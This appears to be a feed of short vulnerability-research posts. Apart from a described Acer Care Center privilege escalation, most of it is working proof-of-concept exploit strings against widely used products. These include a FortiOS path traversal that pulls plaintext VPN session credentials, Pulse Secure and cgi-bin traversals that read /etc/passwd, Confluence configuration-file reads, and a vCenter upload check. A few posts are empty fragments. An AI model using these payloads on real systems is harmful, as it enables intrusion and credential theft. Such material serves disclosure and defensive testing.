Recent Vulmon Research Posts

Acer ships most of the laptop it sells with a software suite called Care Center Service installed. In versions up to 4.00.3034 included, one of the suite’s programs is an executable named ListCheck.exe, which runs at logon with the highest privilege available and suffers from a phantom DLL hijacking. This can lead to a privilege escalation when an administrator logs in. Blogpost: https://aptw.tf/2022/01/20/acer-care-center-privesc.html

Fortinet FortiOS Path Traversal Retrieving plaintext credentials: https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Getting passwd content with Pulse Secure unauthenticated path traversal: https://localhost/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

If you have permission to modify the configuration file, then you already got the machine. How can it be a vulnerability?

POC of Liferay Portal RCE:

A fake CVE. Source:

VMware vCenter Server file upload vulnerability POC If below command response with anything other than 404, the application is vulnerable: curl -X POST "http://HOST:PORT/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "Test_Workaround" -H "Content-Type: application/json" -v 2>&1 | grep HTTP

POCs for Atlassian Confluence Server Arbitrary File Read: 1) http://127.0.0.1/s/123cfx/_/;/WEB-INF/web.xml 2) http://127.0.0.1/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml 3) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties 4) http://127.0.0.1/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml https://github.com/ColdFusionX/CVE-2021-26085

PoC: 127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Fortinet FortiWeb OS Command Injection PoC The patch will be released at the end of August https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/